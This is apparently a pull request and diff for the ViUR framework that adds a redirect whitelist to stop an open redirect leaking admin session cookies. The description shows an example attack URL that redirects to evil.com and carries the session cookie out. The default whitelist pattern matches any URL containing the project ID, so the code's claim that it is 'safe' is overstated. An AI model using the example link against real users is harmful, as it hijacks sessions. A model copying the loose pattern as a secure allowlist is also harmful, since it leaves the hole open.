### PR TITLE
fix: Whitelist redirect_to in `get_cookie_for_app` to prevent open-redirect attacks

### DIFF
--- a/src/viur/core/config.py
+++ b/src/viur/core/config.py
@@ -730,6 +730,27 @@ class User(ConfigType):
     If the user's email address belongs to any other domain,
     no account is created."""
 
+    redirect_whitelist: list[str] | t.Callable[[], list[str]] = (
+        lambda: ["http://localhost:*", f"https://*{_project_id}.appspot.com*"]
+    )
+    """Allowed redirect_to patterns for get_cookie_for_app (matched via :func:`fnmatch.fnmatch`).
+
+    The default is a callable that permits only ``http://localhost:*`` and any URL
+    containing the current GCP project-ID — a safe built-in policy.
+    A zero-argument callable is supported and evaluated on every request.
+    Use ``["*"]`` to disable the restriction entirely.
+
+    Examples::
+
+        conf.user.redirect_whitelist = [
+            "http://localhost:*",
+            "https://*.myapp.appspot.com*",
+        ]
+
+        # dynamic / lazily evaluated
+        conf.user.redirect_whitelist = lambda: load_whitelist_from_db()
+    """
+
     def __setattr__(self, name: str, value: t.Any) -> None:
         if name == "session_life_time":
             if not isinstance(value, datetime.timedelta):

--- a/src/viur/core/modules/user.py
+++ b/src/viur/core/modules/user.py
@@ -1,6 +1,7 @@
 import abc
 import datetime
 import enum
+import fnmatch
 import functools
 import hashlib
 import hmac
@@ -1738,7 +1739,7 @@ class User(List):
         return self.render.render(f"trigger/{action}Success", skel)
 
     @exposed
-    @access("admin", "root")
+    @access("admin", "root", offer_login=True)
     def get_cookie_for_app(self, redirect_to: str = None):
         """
         Generates a session cookie for the currently logged-in user and hands it to an external
@@ -1785,9 +1786,28 @@ class User(List):
             When omitted, the raw ``Set-Cookie`` string is returned as ``text/plain``
             (useful for debugging or direct API calls).
 
-        :raises errors.Redirect: Always raised when *redirect_to* is supplied.
+        .. warning:: **Open-redirect / session-hijacking risk**
+
+            Because the session cookie is appended as a plain query parameter, an
+            attacker who can convince an authenticated admin to click a crafted link
+            (e.g. via phishing) could redirect the browser to an evil server that
+            simply harvests the ``cookie`` parameter and gains full session access.
+
+            To mitigate this, all ``redirect_to`` values are validated against
+            :attr:`conf.user.redirect_whitelist` using :func:`fnmatch.fnmatch`.
+            Only explicitly whitelisted URL patterns are accepted;
+            anything else is rejected with ``403 Forbidden``.
+            Configure the whitelist in your project to include every legitimate
+            callback origin (local scripts, internal tooling, etc.).
+
+        :raises errors.Forbidden: When *redirect_to* does not match any pattern in
+            :attr:`conf.user.redirect_whitelist`.
+        :raises errors.Redirect: Always raised when *redirect_to* is supplied and allowed.
         """
         if redirect_to:
+            whitelist = utils.ensure_iterable(conf.user.redirect_whitelist)
+            if not any(fnmatch.fnmatch(redirect_to, pat) for pat in whitelist):
+                raise errors.Forbidden(f"Redirect target is not whitelisted")
             if "?" not in redirect_to:
                 redirect_to = f"{redirect_to}?"
             raise errors.Redirect(


### PR DESCRIPTION
### Vulnerability

`get_cookie_for_app` appends the session cookie as a plain query parameter to the caller-supplied `redirect_to` URL and then redirects the browser there:

```
/vi/user/get_cookie_for_app?redirect_to=https://evil.com
  → 302 to: https://evil.com?cookie=viur_session=ABC123...&app=my-project
```

Because the `redirect_to` value was never validated, an attacker could craft a link pointing to an arbitrary server they control. If they can convince an authenticated admin to open that link — via phishing, a compromised page, or even a chat message — the browser follows the redirect and the attacker's server receives the full `Set-Cookie` string as a URL parameter. That string is sufficient to impersonate the admin for the lifetime of the session. No credentials needed.

The endpoint requires `admin` or `root` access to reach, which limits exposure, but privileged users are precisely the high-value targets for this kind of attack.

### Changes

A `conf.user.redirect_whitelist` config option is introduced. Before performing any redirect, the target URL is matched against the whitelist using `fnmatch`. Non-matching targets are rejected with `403 Forbidden`.

The default policy (a callable, so it's evaluated lazily) permits only `http://localhost:*` and any URL on the project's own appspot domain — safe for local scripts and internal tooling without requiring explicit configuration. Projects can override it with a static list or a callable for dynamic scenarios. Setting it to `["*"]` restores the previous unrestricted behaviour.
